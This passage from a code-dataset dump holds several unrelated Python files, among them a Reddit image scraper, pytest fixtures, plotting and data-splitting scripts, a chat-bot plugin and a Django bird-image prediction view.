(255,0,0),\r\n 'o': (0,255,0),\r\n 'cross': (0,0,255)}"},"size":{"kind":"number","value":192,"string":"192"}}},{"rowIdx":128490,"cells":{"max_stars_repo_path":{"kind":"string","value":"resources/reddit.py"},"max_stars_repo_name":{"kind":"string","value":"WasinUddy/Reddit-Image-Scraper"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"id":{"kind":"string","value":"2172574"},"content":{"kind":"string","value":"import pandas as pd\nimport numpy as np\nimport praw\n\nimport cv2\nimport requests\n\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom PIL import Image as PILIMAGE\nimport os\nfrom pathlib import Path\n\nclass Reddit:\n\n def __init__(self, client_ID, client_secret):\n \n self.reddit = praw.Reddit(\n client_id=client_ID,\n client_secret=client_secret,\n user_agent='cor',\n username=None,\n password=\n )\n self.index = 0\n\n \n \n\n \n def getSubreddit(self, csvFile):\n \n self.subreddits = []\n f_final = open(csvFile, \"r\")\n \n for line in f_final:\n sub = line.strip()\n self.subreddits.append(sub)\n\n def run(self, N, path):\n print(path)\n self.downloadImage(N, path)\n \n\n def downloadImage(self, N, path):\n\n ignoreImages = [cv2.imread(\"resources/ignoreImages/imageNF.png\"), cv2.imread(\"resources/ignoreImages/DeletedIMG.png\")]\n \n for subreddit in self.subreddits:\n if not os.path.exists(f\"{path}/{subreddit}\"):\n os.makedirs(f\"{path}/{subreddit}\")\n \n \n subreddit = self.reddit.subreddit(subreddit)\n i = 0\n for submission in subreddit.new(limit=int(N)):\n \n \n #\n # \n # self.progress['value'] += self.progress['value']\n try:\n if \"jpg\" in submission.url.lower() or \"png\" in submission.url.lower():\n \n \n resp = requests.get(submission.url.lower(), stream=True).raw\n image = np.asarray(bytearray(resp.read()), dtype='uint8')\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n \n\n # Compare with ignore Image\n ignoreERROR = False\n\n compare_image = cv2.resize(image, (224, 224))\n for ignore in ignoreImages:\n \n diff = cv2.subtract(ignore, compare_image)\n b_ch, g_ch ,r_ch = cv2.split(diff)\n tdiff = cv2.countNonZero(b_ch) + cv2.countNonZero(g_ch) + cv2.countNonZero(r_ch)\n \n # Image has to be ignore\n if tdiff == 0:\n ignoreERROR = True\n \n if not ignoreERROR:\n \n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n img = PILIMAGE.fromarray(image)\n img.save(f\"{path}/{subreddit}/{i}.png\")\n print(f\"saved --> {path}/{subreddit}/{i}.png\")\n i += 1\n except:\n pass\n \n \n\n\n \n\n \n \n\n \n\n \n\n\n\n\n"},"size":{"kind":"number","value":3120,"string":"3,120"}}},{"rowIdx":128491,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/conftest.py"},"max_stars_repo_name":{"kind":"string","value":"sandervalstar/winix"},"max_stars_count":{"kind":"number","value":32,"string":"32"},"id":{"kind":"string","value":"2171320"},"content":{"kind":"string","value":"\"\"\"Tests for Winixdevice component.\"\"\"\n\nfrom unittest.mock import AsyncMock, MagicMock, Mock\n\nimport pytest\n\nfrom custom_components.winix.device_wrapper import WinixDeviceWrapper\nfrom custom_components.winix.driver import WinixDriver\n\n\n@pytest.fixture\ndef mock_device_wrapper() -> WinixDeviceWrapper:\n \"\"\"Return a mocked WinixDeviceWrapper instance.\"\"\"\n\n device_wrapper = MagicMock()\n device_wrapper.info.mac = \"f190d35456d0\"\n device_wrapper.info.alias = \"Purifier1\"\n\n device_wrapper.async_plasmawave_off = AsyncMock()\n device_wrapper.async_plasmawave_on = AsyncMock()\n device_wrapper.async_set_preset_mode = AsyncMock()\n device_wrapper.async_set_speed = AsyncMock()\n device_wrapper.async_turn_on = AsyncMock()\n\n yield device_wrapper\n\n\n@pytest.fixture\ndef mock_driver() -> WinixDriver:\n \"\"\"Return a mocked WinixDriver instance.\"\"\"\n client = Mock()\n device_id = \"device_1\"\n yield WinixDriver(device_id, client)\n\n\n@pytest.fixture\ndef mock_driver_with_payload(request) -> WinixDriver:\n \"\"\"Return a mocked WinixDriver instance.\"\"\"\n\n json_value = {\"body\": {\"data\": [{\"attributes\": request.param}]}}\n\n response = Mock()\n response.json = AsyncMock(return_value=json_value)\n\n client = Mock() # aiohttp.ClientSession\n client.get = AsyncMock(return_value=response)\n\n device_id = \"device_1\"\n yield WinixDriver(device_id, client)\n"},"size":{"kind":"number","value":1385,"string":"1,385"}}},{"rowIdx":128492,"cells":{"max_stars_repo_path":{"kind":"string","value":"dev/scripts/docker_build.py"},"max_stars_repo_name":{"kind":"string","value":"scailfin/flowserv-core"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2171970"},"content":{"kind":"string","value":"from flowserv.controller.worker.docker import docker_build\n\nimage, logs = docker_build(name='test_build', requirements=['histore'])\n\nprint('\\n'.join(logs))\nprint()\nprint(image)\n"},"size":{"kind":"number","value":177,"string":"177"}}},{"rowIdx":128493,"cells":{"max_stars_repo_path":{"kind":"string","value":"GEOS_Util/coupled_diagnostics/verification/levitus/s_profile.py"},"max_stars_repo_name":{"kind":"string","value":"GEOS-ESM/GMAO_Shared"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2170120"},"content":{"kind":"string","value":"#!/bin/env python\n\nimport os\nimport scipy as sp\nimport matplotlib.pyplot as pl\nfrom matplotlib import ticker\n\n# Read variable\nexecfile('ctl.py')\n\niind=300\ns=ctl.fromfile('salt',iind=iind).ave(0)\ns.name='S at 60W'\n\n###################### Do plots #######################################################\nclevs=sp.arange(33.,36.1,0.2)\n\npl.figure(1)\npl.clf()\ns.copts={'func': pl.contourf,\\\n 'levels' : clevs,\\\n }\ns.plot2d(); s.copts.clear()\ns.copts={'levels' : clevs[0::2],\\\n 'colors' : 'black',\\\n 'func': pl.contour\n }\ns.plot2d()\nax=pl.gca(); ax.set_ylim(0.,3000.); ax.invert_yaxis(); ax.set_ylabel('depth, m')\nax.xaxis.set_major_locator(ticker.MultipleLocator(30))\npl.grid(); pl.show()\npl.savefig('pics/s_profile/s_60W.png')\n\n\n"},"size":{"kind":"number","value":765,"string":"765"}}},{"rowIdx":128494,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/main.py"},"max_stars_repo_name":{"kind":"string","value":"CosminNechifor/Assembly-to-VHDL-memory"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172182"},"content":{"kind":"string","value":"from tkinter import *\nfrom src.tools import parser\nfrom src.bll import logic\n\n\nglobal text\nglobal riscInstructions\n\nPATH_TO_JSON = './tools/instructions.json'\nPATH_TO_MEMORY_S = './bll/memoryStart.txt'\nPATH_TO_MEMORY_E = './bll/memoryEnd.txt'\n\ndef writeMemory():\n # assemblyCode = text.get(\"1.0\",END).split('\\n')\n # assemblyCode.pop()\n assemblyCode = ['XOR r1, r2, r3', 'ADDI r3, r2, 100', 'JMP r4']\n size = len(assemblyCode)\n binary = logic.convertAssemblyToBinary(assemblyCode, riscInstructions)\n print(binary)\n logic.binaryToVHDLMemory(binary, pathS=PATH_TO_MEMORY_S, pathE=PATH_TO_MEMORY_E)\n\n\n\n\ndef createWindow():\n global text\n global riscInstructions\n\n quit = Button(text=\"QUIT\", fg=\"red\",\n command=root.destroy)\n quit.pack(side=\"bottom\")\n assemble = Button(text=\"Create memory\", fg=\"blue\", command=writeMemory)\n assemble.pack(side=\"bottom\")\n\n scroolBar = Scrollbar(root)\n\n text = Text(root, height=50, width=50)\n scroolBar.pack(side=RIGHT, fill=Y)\n text.pack(side=LEFT, fill=Y)\n scroolBar.config(command=text.yview)\n text.config(yscrollcommand=scroolBar.set)\n riscInstructions = parser.getInstructions(PATH_TO_JSON)\n\nif __name__ == '__main__':\n root = Tk()\n createWindow()\n root.mainloop()\n"},"size":{"kind":"number","value":1267,"string":"1,267"}}},{"rowIdx":128495,"cells":{"max_stars_repo_path":{"kind":"string","value":"runners/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"maximilianschaller/genforce"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2169221"},"content":{"kind":"string","value":"# python3.7\n\"\"\"Collects all runners.\"\"\"\n\nfrom .stylegan_runner_fourier_regularized import FourierRegularizedStyleGANRunner\n\n__all__ = ['FourierRegularizedStyleGANRunner']\n"},"size":{"kind":"number","value":171,"string":"171"}}},{"rowIdx":128496,"cells":{"max_stars_repo_path":{"kind":"string","value":"Spliter.py"},"max_stars_repo_name":{"kind":"string","value":"MHDBST/Movie_Recommender_System"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172515"},"content":{"kind":"string","value":"import random\r\nimport math\r\n\r\nfile='ratings.csv'\r\ntrain_list=[]\r\ntest_list=[]\r\ntemp_list=[]\r\npreID=-1\r\n\r\n\r\nwith open(file) as votes:\r\n for i,vote in enumerate(votes):\r\n if i==0: continue\r\n tokens=vote.split(',')\r\n userID=int(tokens[0])\r\n movieID=int(tokens[1])\r\n rate=float(tokens[2])\r\n\r\n if(userID==preID):\r\n temp_list.append(vote)\r\n else:\r\n preID=userID\r\n size=int(math.floor(len(temp_list)/10))\r\n test=random.sample(range(0, len(temp_list)), size)\r\n for i,item in enumerate(temp_list):\r\n if i in test:\r\n test_list.append(item)\r\n else:\r\n train_list.append(item)\r\n #print len(train_list),len(test_list)\r\n temp_list=[]\r\n temp_list.append(vote)\r\n\r\noutput=open('train.csv','w')\r\nfor item in train_list:\r\n output.write(item)\r\noutput=open('test.csv','w')\r\nfor item in test_list:\r\n output.write(item)\r\n"},"size":{"kind":"number","value":1012,"string":"1,012"}}},{"rowIdx":128497,"cells":{"max_stars_repo_path":{"kind":"string","value":"extendPlugins/chuo.py"},"max_stars_repo_name":{"kind":"string","value":"f88af65a/XyzB0ts"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"id":{"kind":"string","value":"2172408"},"content":{"kind":"string","value":"from botsdk.util.BotPlugin import BotPlugin\n\n\nclass plugin(BotPlugin):\n def onLoad(self):\n self.name = \"chuo\"\n self.addType(\"NudgeEvent\", self.nudge)\n self.addBotType(\"Mirai\")\n self.canDetach = True\n\n async def nudge(self, request):\n if str(request[\"target\"]) == request.getBot().getQq():\n await request.getBot().sendNudge(target=request[\"fromId\"],\n subject=request[\"subject\"][\"id\"],\n kind=request[\"subject\"][\"kind\"])\n\n\ndef handle():\n return plugin()\n"},"size":{"kind":"number","value":594,"string":"594"}}},{"rowIdx":128498,"cells":{"max_stars_repo_path":{"kind":"string","value":"examples/ignore-timeout.py"},"max_stars_repo_name":{"kind":"string","value":"commtech/pyfscc"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2171829"},"content":{"kind":"string","value":"import fscc\n\nif __name__ == '__main__':\n p = fscc.Port(0)\n\n status = p.ignore_timeout\n\n p.ignore_timeout = True\n p.ignore_timeout = False\n"},"size":{"kind":"number","value":150,"string":"150"}}},{"rowIdx":128499,"cells":{"max_stars_repo_path":{"kind":"string","value":"pythontutor-ru/07_lists/08_num_distinct.py"},"max_stars_repo_name":{"kind":"string","value":"ornichola/learning-new"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2172271"},"content":{"kind":"string","value":"\"\"\"\nhttp://pythontutor.ru/lessons/lists/problems/num_distinct/\nДан список, упорядоченный по неубыванию элементов в нем. Определите, сколько в нем различных элементов.\n\"\"\"\n\nlst = [int(i) for i in input().split()]\ncounter = 1\nfor i in range(len(lst) - 1):\n if lst[i] != lst[i + 1]:\n counter += 1\n\nprint(counter)\n"},"size":{"kind":"number","value":320,"string":"320"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":1284,"numItemsPerPage":100,"numTotalItems":129320,"offset":128400,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjQyMzE2MSwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9zdGFyY29kZXJkYXRhX3B5X3Ntb2wiLCJleHAiOjE3NTY0MjY3NjEsImlzcyI6Imh0dHBzOi8vaHVnZ2luZ2ZhY2UuY28ifQ.Q_m9MNRTnkdcIVPeFe4hv5noX74w-wnpdkcs1nxA7fPN9bt7LlRVH5Dvk3_YDoByqaoVIMcZRjxneeIMTJPlBQ","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
max_stars_repo_path
stringlengths
4
182
max_stars_repo_name
stringlengths
6
116
max_stars_count
int64
0
191k
id
stringlengths
7
7
content
stringlengths
100
10k
size
int64
100
10k
venv/Scripts/ex092.py
SamuelNunesDev/starting_point_in_python
0
2170977
from datetime import date d = dict() d["Nome"] = input('Nome: ') d["Idade"] = int(input('Ano de nascimento: ')) d["Idade"] = date.today().year - d["Idade"] d["CTPS"] = int(input('CTPS: (0 não tem)')) if d["CTPS"] != 0: d["Ano de contratação"] = int(input('Ano de contratação: ')) d["Salario"] = float(input('Salário: R$')) d["Aposentadoria"] = d["Idade"] + 35 for k, v in d.items(): if k in 'Salario': print(f'{k}: R${v:.2f}') elif k in 'Aposentadoria': print(f'{k}: {v} anos') else: print(f'{k}: {v}') else: for k, v in d.items(): print(f'{k}: {v}')
640
examples/Ni__eam__born_exp_fs/preconditioning_3.5NN/test__configuration_file.py
eragasa/pypospack
4
2172001
import pytest from pypospack.pyposmat.data import PyposmatConfigurationFile configuration_fn = 'data/pyposmat.config.in' config = PyposmatConfigurationFile() config.read(filename=configuration_fn) print(config.sampling_type) print(config.configuration['sampling_type'])
274
src/scvmm/azext_scvmm/scvmm_utils.py
haroonf/azure-cli-extensions
0
2167907
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from azure.cli.core.azclierror import InvalidArgumentValueError from azure.cli.core.commands.client_factory import get_subscription_id from msrestazure.tools import is_valid_resource_id, resource_id from azext_scvmm.scvmm_constants import ( EXTENDED_LOCATION_TYPE, ) from .vendored_sdks.models import ( ExtendedLocation, ) def get_resource_id( cmd, resource_group_name: str, provider_name_space: str, resource_type: str, resource: str, ): """ Gets the resource id for the resource if name is given. """ if resource is None or is_valid_resource_id(resource): return resource return resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name, namespace=provider_name_space, type=resource_type, name=resource, ) def create_dictionary_from_arg_string(values, option_string=None): """ Creates and returns dictionary from a string containing params in KEY=VALUE format. """ params_dict = {} for item in values: try: key, value = item.split('=', 1) params_dict[key.lower()] = value except ValueError as err: raise InvalidArgumentValueError( f'usage error: {option_string} KEY=VALUE [KEY=VALUE ...]' ) from err return params_dict def get_extended_location(custom_location): return ExtendedLocation( type=EXTENDED_LOCATION_TYPE, name=custom_location, )
1,861
pyplif_hippos/hippos.py
enade-istyastono/PyPLIF-HIPPOS
0
2170074
#!/usr/bin/env python from __future__ import print_function import sys from time import time from initialize.parse_conf import parse_config from ifp_processing import get_bitstring from similarity import count_abcdp, how_similar def replace_bit_char(bitstring, bit_index_list): for i, v in enumerate(bit_index_list): if v == 1: bitstring = bitstring[:i] + "n" + bitstring[i+1:] return bitstring def main(): x = time() """ Steps: 1. Read HIPPOS config file 2. Read docking config file 3. Get docking result 4. Get bitstring by analyzing docking result 5. Write basic info to log and output file 6. Write bitstring (and similarity) to output file """ hippos_config = parse_config() logfile = open(hippos_config["logfile"], "w") # Output #4 """ Parse docking configuration file Get docking results: protein ==> OBMol Object docked_ligands ==> List of OBMol docked_proteins ==> List of OBMol (only for PLANTS) mollist ==> List of ligand name + pose number scorelist ==> List of docking score """ if hippos_config["docking_method"] == "plants": from initialize.parse_docking_conf import parse_plants_conf docking_conf = hippos_config["docking_conf"] docking_results = parse_plants_conf(docking_conf) else: from initialize.parse_docking_conf import parse_vina_conf docking_conf = hippos_config["docking_conf"] docking_results = parse_vina_conf(docking_conf) # checking docking output, if not found then exit. if len(docking_results["docked_ligands"]) == 0: missing_docking_output = ( "The docking output could not be found. Please check your docking result." ) print(missing_docking_output) logfile.write(missing_docking_output) logfile.close() sys.exit(1) """ Get Bitstring using docking results & hippos configuration bitstrings ==> Dictionary, with resname as key Residue object as value """ bitstrings = get_bitstring(docking_results, hippos_config) # Write Output & Log files scorelist = docking_results["scorelist"] ligand_pose = [] if hippos_config["docking_method"] == "plants": for mol in docking_results["mollist"]: mol = mol.split("_") new_name = mol[0] + "_" + mol[-1] ligand_pose.append(new_name) if hippos_config["docking_method"] == "vina": ligand_pose = docking_results["mollist"] # set flag for every chosen output mode output_mode = hippos_config["output_mode"] simplified_flag = output_mode["simplified"] full_flag = output_mode["full"] full_nobb_flag = output_mode["full_nobb"] # set file handler for every chosen output mode if simplified_flag: simplified_outfile = open(hippos_config["simplified_outfile"], "w") # Output #1 if full_flag: full_outfile = open(hippos_config["full_outfile"], "w") # Output #2 if full_nobb_flag: full_nobb_outfile = open(hippos_config["full_nobb_outfile"], "w") # Output #3 # write ligand info and similarity coef info logfile.write( "Ligand name is %s with %s poses\n\n" % (ligand_pose[0].split("_")[0], len(ligand_pose)) ) # Output Logfile similarity_coef = hippos_config["similarity_coef"] if similarity_coef: sim_outfile = open(hippos_config["sim_outfile"], "w") # Output #5 logfile.write( "similarity coefficient used are %s\n" % (", ".join(similarity_coef)) ) # Output Logfile # if simplified then write the length and position for each bitstring if simplified_flag: logfile.write( "%s %s %s %s\n" % ("RESNAME", "length", "startbit", "endbit") ) # Output Logfile # Iterate through pose and write the ligand+pose, docking score, # similarity coef, bitstring log_flag = True bitstring_zero = False for pose, (ligand_name, score) in enumerate(zip(ligand_pose, scorelist)): ligand_name = ligand_name.replace(" ", "_").ljust(16) score = score.ljust(9) simp_bits = "" full_bits = "" nobb_bits = "" # Concatenate bitstring from every residue, then write to their respective # output file bit_start = 1 for resname in hippos_config["residue_name"]: bit_replace_index = bitstrings[resname].bit_replace_index simp_bit_replace_index = bitstrings[resname].simp_bit_replace_index if simplified_flag: simp_res_bit = bitstrings[resname].simp_bits_list[pose].to01() if bool(sum(simp_bit_replace_index)): simp_res_bit = replace_bit_char(simp_res_bit, simp_bit_replace_index) simp_bits += simp_res_bit if full_flag: full_res_bit = bitstrings[resname].full_bits_list[pose].to01() if bool(sum(bit_replace_index)): full_res_bit = replace_bit_char(full_res_bit, bit_replace_index) full_bits += full_res_bit if full_nobb_flag: nobb_res_bit = bitstrings[resname].full_nobb_list[pose].to01() if bool(sum(bit_replace_index)): nobb_res_bit = replace_bit_char(nobb_res_bit, bit_replace_index) nobb_bits += nobb_res_bit if log_flag & simplified_flag: bitlength = len(simp_res_bit) bit_end = bit_start + bitlength - 1 logfile.write( "%-10s %-6s %-7s %s\n" % (resname, bitlength, bit_start, bit_end) ) # Output Logfile bit_start += bitlength log_flag = False if simplified_flag: simplified_outfile.write("%s %s %s\n" % (ligand_name, score, simp_bits)) if full_flag: full_outfile.write("%s %s %s\n" % (ligand_name, score, full_bits)) if full_nobb_flag: full_nobb_outfile.write("%s %s %s\n" % (ligand_name, score, nobb_bits)) # If similarity coef requested => calculate abcd and p if similarity_coef: abcdp_list = [] coefficient = [] if full_flag: for full in hippos_config["full_ref"]: abcdp_list.append(count_abcdp(full, full_bits)) elif full_nobb_flag: for nobb in hippos_config["full_nobb_ref"]: abcdp_list.append(count_abcdp(nobb, nobb_bits)) else: for simp in hippos_config["simplified_ref"]: abcdp_list.append(count_abcdp(simp, simp_bits)) for sim_coef in similarity_coef: for abcdp in abcdp_list: similarity_value = how_similar(abcdp, sim_coef) try: coefficient.append("%.3f" % similarity_value) except TypeError: coefficient.append("%s" % similarity_value) bitstring_zero = True sim_outfile.write( "%s %s\n" % (ligand_name, " ".join(coefficient)) ) # Output Similarity # Close all file if simplified_flag: simplified_outfile.close() if full_flag: full_outfile.close() if full_nobb_flag: full_nobb_outfile.close() if similarity_coef: sim_outfile.close() y = time() z = y - x if bitstring_zero: bitstring_error = """ It appears that one of the target or reference bitstring is zero, Check the ligand pose that generate 'NA' value. """ print(bitstring_error) logfile.write(bitstring_error) print("Total time taken %.3f s." % z) logfile.write("\nTotal time taken %.3f s." % z) logfile.close() if __name__ == "__main__": main()
7,949
src/utils/accelerator/core.py
iaeiou/awesome-hugo-themes
4
2170346
# -*- coding: utf-8 -*- # Time : 2021/10/3 8:59 # Author : QIN2DIM # Github : https://github.com/QIN2DIM # Description: import gevent from gevent.queue import Queue class CoroutineSpeedup: def __init__(self, work_q: Queue = None, task_docker=None, power: int = None, debug: bool = True): # 任务容器:queue self.work_q = work_q if work_q else Queue() self.done_q = Queue() # 任务容器:迭代器 self.task_docker = task_docker # 协程数 self.power = power # 是否打印日志信息 self.debug_logger = debug # 任务队列满载时刻长度 self.max_queue_size = 0 def launch(self): while not self.work_q.empty(): task = self.work_q.get_nowait() self.control_driver(task) def control_driver(self, task): """ rewrite this method @param task: @return: """ def preload(self): """ :return: """ def offload_task(self): """ @return: """ if self.task_docker: for task in self.task_docker: self.work_q.put_nowait(task) self.max_queue_size = self.work_q.qsize() def killer(self): """ @return: """ pass def go(self, power: int = 8) -> None: """ @param power: 协程功率 @return: """ # 任务重载 self.preload() self.offload_task() task_list = [] # 配置弹性采集功率 power_ = self.power if self.power else power if self.max_queue_size != 0: power_ = self.max_queue_size if power_ > self.max_queue_size else power_ self.power = power_ # 任务启动 for _ in range(power_): task = gevent.spawn(self.launch) task_list.append(task) gevent.joinall(task_list) # 缓存回收 self.killer()
1,892
app/role/model.py
fauziwei/_flask_
0
2172494
# coding: utf-8 '''Fauzi, <EMAIL>''' from app.model import db, CRUD class Role(db.Model, CRUD): __tablename__ = 'role' id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(250), nullable=True, unique=True) description = db.Column(db.String(250)) user = db.relationship('User', backref='role', lazy='dynamic') def __repr__(self): return '<Role %s>' % self.name
391
src/model/sr/vdsr.py
sanghyun-son/srwarp
82
2172411
from bicubic_pytorch import core from config import get_config from model import common import torch from torch import nn from torch.nn import init class VDSR(nn.Module): def __init__( self, depth: int=20, n_colors: int=3, n_feats: int=64, conv=common.default_conv) -> None: super().__init__() m = [] block = lambda x, y: common.BasicBlock(x, y, 3) m.append(block(n_colors, n_feats)) for _ in range(depth - 2): m.append(block(n_feats, n_feats)) m.append(conv(n_feats, n_colors, 3)) self.convs = nn.Sequential(*m) for m in self.modules(): if isinstance(m, nn.Conv2d): init.kaiming_normal_(m.weight) m.bias.data.fill_(0) return @staticmethod def get_kwargs(cfg, conv=common.default_conv) -> dict: parse_list = ['depth', 'n_colors', 'n_feats'] kwargs = get_config.parse_namespace(cfg, *parse_list) kwargs['conv'] = conv return kwargs def forward(self, x: torch.Tensor, scale: float) -> torch.Tensor: with torch.no_grad(): x = core.imresize(x, scale=scale, kernel='cubic') x = x + self.convs(x) return x
1,284
S4/S4 Decompiler/decompyle3/parsers/reducecheck/__init__.py
NeonOcean/Environment
1
2169830
from decompyle3.parsers.reducecheck.and_check import * from decompyle3.parsers.reducecheck.and_cond_check import * from decompyle3.parsers.reducecheck.and_not_check import * from decompyle3.parsers.reducecheck.break38 import * from decompyle3.parsers.reducecheck.if_and_stmt import * from decompyle3.parsers.reducecheck.if_and_elsestmt import * from decompyle3.parsers.reducecheck.ifelsestmt import * from decompyle3.parsers.reducecheck.iflaststmt import * from decompyle3.parsers.reducecheck.ifstmt import * from decompyle3.parsers.reducecheck.ifstmts_jump import * from decompyle3.parsers.reducecheck.for38 import * from decompyle3.parsers.reducecheck.lastc_stmt import * from decompyle3.parsers.reducecheck.list_if_not import * from decompyle3.parsers.reducecheck.not_or_check import * from decompyle3.parsers.reducecheck.or_check import * from decompyle3.parsers.reducecheck.or_cond_check import * from decompyle3.parsers.reducecheck.pop_return import * from decompyle3.parsers.reducecheck.testtrue import * from decompyle3.parsers.reducecheck.c_tryelsestmt import * from decompyle3.parsers.reducecheck.tryexcept import * from decompyle3.parsers.reducecheck.while1elsestmt import * from decompyle3.parsers.reducecheck.while1stmt import * from decompyle3.parsers.reducecheck.whilestmt import *
1,297
dataset/correct_h5_name.py
vuhoangminh/medical-segmentation
1
2172571
import os import glob from unet3d.utils.path_utils import get_project_dir, get_h5_training_dir from brats.config import config CURRENT_WORKING_DIR = os.path.realpath(__file__) PROJECT_DIR = get_project_dir(CURRENT_WORKING_DIR, config["project_name"]) BRATS_DIR = os.path.join(PROJECT_DIR, config["brats_folder"]) DATASET_DIR = os.path.join(PROJECT_DIR, config["dataset_folder"]) for h5_path in glob.glob(os.path.join(BRATS_DIR, "database", "*", "*.h5")): # print(h5_path) print("old name:", h5_path) if "norm-minh" in h5_path: new_name = h5_path.replace("norm-minh", "norm-01_hist-1") if "norm-z" in h5_path: new_name = h5_path.replace("norm-z", "norm-z-old_hist-0") print(">> rename to:", new_name) os.rename(h5_path, new_name)
789
哥伦布(STM32F407)/1.基础实验/2.流水灯/v2.0/main.py
01studio-lab/MicroPython_Examples
73
2172145
''' 实验名称:流水灯 版本:v2.0 日期:2020.12 作者:01Studio ''' from pyb import LED,delay #从pyb导入LED模块 # 相当于for i in [2, 3, 4],LED(i).off()执行3次,分别是LED 2,3,4 for i in range(2,5): LED(i).off() while True: #使用for循环 for i in range(2,5): LED(i).on() delay(1000) #延时1000毫秒,即1秒 LED(i).off()
310
src/python/entity_align/utils/PrintBestResults.py
amnda-d/learned-string-alignments
40
2168266
""" Copyright (C) 2017-2018 University of Massachusetts Amherst. This file is part of "learned-string-alignments" http://github.com/iesl/learned-string-alignments Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import sys import json import os from collections import defaultdict from entity_align.utils.Config import Config if __name__ == "__main__": file_of_scores = sys.argv[1] only_best = True if len(sys.argv) > 2 and sys.argv[2] == "True" else False score_objs = [] with open(file_of_scores, 'r') as fin: for line in fin: js = json.loads(line.strip()) c = Config() c.__dict__ = js['config'] js['config'] = c score_objs.append(js) for js in score_objs: print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "MAP", js['map'])) print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@1", js['hits_at_1'])) print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@10", js['hits_at_10'])) print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@50", js['hits_at_50']))
1,691
python/kata/5-kyu/RGB To Hex Conversion/main.py
Carlososuna11/codewars-handbook
0
2172239
import codewars_test as test from solution import rgb test.assert_equals(rgb(0,0,0),"000000", "testing zero values") test.assert_equals(rgb(1,2,3),"010203", "testing near zero values") test.assert_equals(rgb(255,255,255), "FFFFFF", "testing max values") test.assert_equals(rgb(254,253,252), "FEFDFC", "testing near max values") test.assert_equals(rgb(-20,275,125), "00FF7D", "testing out of range values")
406
RadioT_PC.py
dimst23/RadioTelescope_CommandLine
0
2169639
#!/usr/local/bin/python import User_Interface import configData import TCPClient import logData import sys if __name__ == '__main__': #Exception handling section for the log file code try: logdata = logData.logData(__name__) except: print("There is a problem with the handling of the log file. See log file for the traceback of the exception.\n") logdata.log("EXCEPT", "There is a problem with the handling of the log file. Program terminates.", __name__) exit(1) #Terminate the script #Exception handling code for the XML file process try: cfgData = configData.confData("settings.xml") except: print("There is a problem with the XML file handling. See log file for the traceback of the exception.\n") logdata.log("EXCEPT", "There is a problem with the XML file handling. Program terminates.", __name__) exit(1) #Terminate the script #Exception handling code for the TCP initial setup try: tcpClient = TCPClient.TCPClient(cfgData) except: print("There is a problem with the TCP handling. See log file for the traceback of the exception.\n") logdata.log("EXCEPT", "There is a problem with the TCP handling. Program terminates.", __name__) exit(1) #Terminate the script #General exception handling code try: User_Interface.uInterface(cfgData, tcpClient) #Initiate the user interface except KeyboardInterrupt: print("User requested termination with a keyboard interrupt.\n") logdata.log("EXCEPT", "User requested termination with a keyboard interrupt.", __name__) tcpClient.disconnect() exit(0) #Terminate the script except: print("Something really bad happened!! We should terminate.\n") logdata.log("EXCEPT", "Something really bad happened!! See the traceback below.", __name__) exit(1) #Terminate the script logdata.logClose() #Terminate all logging operations before exiting the script
2,019
apps/prediction/views.py
OUC-iBird/iBird_Back_End
0
2172009
import re import os from ratelimit.decorators import ratelimit from iBird import settings from apps.prediction.neural_network.predict_server import NeuralNetwork from apps.utils.decorator import RequiredMethod, RequiredParameters, Protect from apps.utils.response_processor import process_response from apps.utils.response_status import ResponseStatus, ValueErrorStatus from apps.prediction import models as prediction_models # 识别网络 net = NeuralNetwork(settings.MODEL_PATH, settings.CLASSES_PATH) @Protect @RequiredMethod('POST') @ratelimit(**settings.RATE_LIMIT_LEVEL_1) @RequiredParameters('path') def predict(request): json_data = request.json_data status = ValueErrorStatus.check_value_type(json_data) if status is not None: return process_response(request, status) path = json_data['path'] if len(path) > 100 or re.search(r'\.\.', path) or path[:9] != '/' + settings.PICTURE_PATH \ or not os.path.exists('.' + path): return process_response(request, ResponseStatus.IMAGE_PATH_NOT_FOUND_ERROR) report = prediction_models.Report.objects.filter(path=path).first() if not report: report = prediction_models.Report(path=path) report.result = net.predicted('.' + path) report.save() request.data = report.transform_into_serialized_data() return process_response(request, ResponseStatus.OK) @Protect @RequiredMethod('GET') @ratelimit(**settings.RATE_LIMIT_LEVEL_3) 